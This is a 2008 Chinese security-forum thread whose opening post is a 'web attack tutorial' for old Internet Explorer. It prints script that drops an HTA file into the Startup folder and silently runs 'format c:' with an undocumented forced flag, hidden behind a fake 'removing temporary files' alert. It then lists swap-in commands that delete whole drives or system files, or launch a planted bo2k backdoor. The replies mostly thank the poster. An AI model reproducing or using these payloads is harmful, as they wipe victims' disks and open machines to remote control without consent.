文本版|topic 高级搜索
   名人堂 帮助 论坛制度 意见反馈 | 首页 博客 周新贴 招聘 专题 新闻
RSS 底部
 
社区导航: 专家门诊   网络技术   操作系统   数据库   程序设计   系统应用   考试认证   CIO及信息化   站长交流   综合交流   下载基地  51CTO产品服务 设为首页 | 收藏本站
51CTO技术论坛» 网络安全 » 网页攻击教学       [ 打印]  [ 订阅]  [ 收藏]  [ 推荐给朋友]   [ 本帖文本页]

论坛跳转:
     
标题: [入侵分析] 网页攻击教学  ( 查看:492  回复:5 )   
 
zhirumuma
新新人类  点击可查看详细



帖子 20
精华 0
无忧币 -2
积分 100
阅读权限 20
注册日期 2008-1-26
最后登录 2008-5-27 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-1-26 17:45   标题:网页攻击教学
上一帖 |
这一项教学就是利用微软( Microsoft )的IE浏览器( Internet Explorer )所衍生出来的
攻击方法。



教学开始∶



以下这段就是具有破坏性的HTML







Hacking Your Computer .






scr.Reset();
scr.Path="C:\WINDOWS\Start Menu\Programs\启动\hack.hta";
scr.Doc="
wsh.Run(start.exe /m format c:/q /autotest /u);
alert(IMPORTANT : Windows is removing unused temporary files.);";
scr.write();







(懂HTML的人应该就看得出来其中精随)



现在我大概来解释其中几个项目所写的意思



scr.Path="C:\WINDOWS\Start Menu\Programs\启动\hack.hta"



这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为
hack.hta



wsh.Run(start.exe /m format c:/q /autotest /u);



通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。



它是一个微软没有公开的功能,键入後format的动作便会被强制执行。



这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。



最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小
化的状态。



执行其他攻击指令的方法∶



只要修改“start.exe /m format c:/q /autotest /u”这一项便形。



start.exe /m format c:/q /autotest /u



其中的“c:”可以换做其他的硬碟。



(path)\bo2k.exe



执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。



start.exe /m deltree /y a:\*.* c:\*.* d:\*.*



杀掉对方硬碟底下所有的档案。



start.exe /m deltree /y c:\windows\system\*.*



杀掉对方c:\windows\system\目录底下的所有档案。



後叙∶



预防遭此手段的破坏就是到微软去更新你的浏览器。



网络工程师到底该不该去考CCIE认证?
2008-1-26 17:451楼
[ 顶部 ]
 
sh-fluke
新新人类  点击可查看详细



帖子 138
精华 0
无忧币 4
积分 138
阅读权限 20
注册日期 2007-10-19
最后登录 2008-5-20 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-1-29 09:11 
好东西,学习学习,感谢楼主



网络工程师到底该不该去考CCIE认证?
2008-1-29 09:112楼
[ 顶部 ]
 
kingerwt
新新人类  点击可查看详细


帖子 20
精华 0
无忧币 34
积分 20
阅读权限 20
注册日期 2008-2-1
最后登录 2008-5-6 离线

[查看资料]  [发短消息]  [Blog
    ICQ 状态     
发表于:2008-2-3 09:17 
忽忽~!学习



网络工程师到底该不该去考CCIE认证?
2008-2-3 09:173楼
[ 顶部 ]
 
cllovy
新新人类  点击可查看详细



帖子 70
精华 0
无忧币 35
积分 70
阅读权限 20
注册日期 2008-2-3
最后登录 2008-2-14 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-2-14 20:24 
学习



网络工程师到底该不该去考CCIE认证?
2008-2-14 20:244楼
[ 顶部 ]
 
clevercong
新新人类  点击可查看详细



帖子 41
精华 0
无忧币 305
积分 57
阅读权限 20
注册日期 2008-2-1
最后登录 2008-4-22 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-2-15 17:49 
我就曾经莫名其妙的被格式化过一次



网络工程师到底该不该去考CCIE认证?
2008-2-15 17:495楼
[ 顶部 ]
 
xujun2008
新新人类  点击可查看详细



帖子 44
精华 0
无忧币 -2
积分 42
阅读权限 20
注册日期 2008-2-29
最后登录 2008-7-23 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-2-29 11:42 
ddddddddddddddddddddddd



网络工程师到底该不该去考CCIE认证?
2008-2-29 11:426楼
[ 顶部 ]
     
论坛跳转:  

| | |

| | |

| | |

标记已读 · 删除论坛Cookies · 文本版 · WAP
 
| 诚征版主 | 版主堂 | 意见建议 | 大史记 | 论坛地图
Copyright©2005-2008 51CTO.COM  Powered by Discuz!
本论坛言论纯属发布者个人意见,不代表51CTO网站立场!如有疑义,请与管理员联系。
京ICP备05051492号